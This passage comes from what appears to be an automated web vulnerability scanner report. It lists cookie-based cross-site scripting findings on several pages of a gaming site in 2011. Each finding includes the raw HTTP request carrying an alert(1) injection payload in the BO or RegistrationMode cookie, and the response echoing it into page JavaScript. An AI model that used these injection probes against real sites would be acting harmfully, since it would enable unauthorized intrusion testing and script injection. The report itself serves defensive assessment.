            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.306. http://www.mundirasca.com/Help.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/Help.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d14ae"-alert(1)-"37554d0d6f9 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Help.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PMd14ae"-alert(1)-"37554d0d6f9; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMd14ae"-alert(1)-"37554d0d6f9; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:05 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:05 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:05 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:05 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:05 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMd14ae"-alert(1)-"37554d0d6f9";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.307. http://www.mundirasca.com/InviteFriend.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/InviteFriend.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6f07"-alert(1)-"d5b1ce0562e was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FMb6f07"-alert(1)-"d5b1ce0562e; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:53 GMT; path=/
Set-Cookie: BO=FMb6f07"-alert(1)-"d5b1ce0562e; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:53 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:53 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:53 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:53 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMb6f07"-alert(1)-"d5b1ce0562e";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.308. http://www.mundirasca.com/InviteFriend.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/InviteFriend.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1384a"-alert(1)-"4fa8e8c2447 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM1384a"-alert(1)-"4fa8e8c2447; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM1384a"-alert(1)-"4fa8e8c2447; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:41 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:41 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:41 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:41 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:41 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM1384a"-alert(1)-"4fa8e8c2447";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.309. http://www.mundirasca.com/PlayersClub.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/PlayersClub.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1a56"-alert(1)-"3cfbf31ac84 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FMe1a56"-alert(1)-"3cfbf31ac84; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:28 GMT; path=/
Set-Cookie: BO=FMe1a56"-alert(1)-"3cfbf31ac84; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:28 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:28 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:28 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:28 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43406

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMe1a56"-alert(1)-"3cfbf31ac84";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.310. http://www.mundirasca.com/PlayersClub.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/PlayersClub.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 261b0"-alert(1)-"49a35498dd0 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM261b0"-alert(1)-"49a35498dd0; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM261b0"-alert(1)-"49a35498dd0; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:18 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:18 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:18 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:18 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:18 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43406

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM261b0"-alert(1)-"49a35498dd0";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.311. http://www.mundirasca.com/Promotions.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/Promotions.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c1e4"-alert(1)-"0007f7cf4fd was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Promotions.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM7c1e4"-alert(1)-"0007f7cf4fd; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:27 GMT; path=/
Set-Cookie: BO=FM7c1e4"-alert(1)-"0007f7cf4fd; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:27 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:27 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:27 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:27 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39130

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM7c1e4"-alert(1)-"0007f7cf4fd";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.312. http://www.mundirasca.com/Promotions.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/Promotions.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed3a6"-alert(1)-"9f4d4b544fd was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Promotions.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PMed3a6"-alert(1)-"9f4d4b544fd; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMed3a6"-alert(1)-"9f4d4b544fd; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:16 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:16 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:16 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:16 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:16 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39130

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMed3a6"-alert(1)-"9f4d4b544fd";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.313. http://www.mundirasca.com/Responsible.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/Responsible.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 594bd"-alert(1)-"42dce1566b9 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Responsible.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM594bd"-alert(1)-"42dce1566b9; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:06 GMT; path=/
Set-Cookie: BO=FM594bd"-alert(1)-"42dce1566b9; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:06 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:06 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:06 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:06 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 42806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM594bd"-alert(1)-"42dce1566b9";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.314. http://www.mundirasca.com/Responsible.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/Responsible.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e850"-alert(1)-"202963a5420 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Responsible.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM3e850"-alert(1)-"202963a5420; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM3e850"-alert(1)-"202963a5420; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:09 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:09 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:09 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:09 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:09 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 42806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM3e850"-alert(1)-"202963a5420";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.315. http://www.mundirasca.com/SecurityAndPrivacy.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/SecurityAndPrivacy.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eed7e"-alert(1)-"ec4303889bc was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FMeed7e"-alert(1)-"ec4303889bc; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:06 GMT; path=/
Set-Cookie: BO=FMeed7e"-alert(1)-"ec4303889bc; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:06 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:06 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:06 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:06 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36037

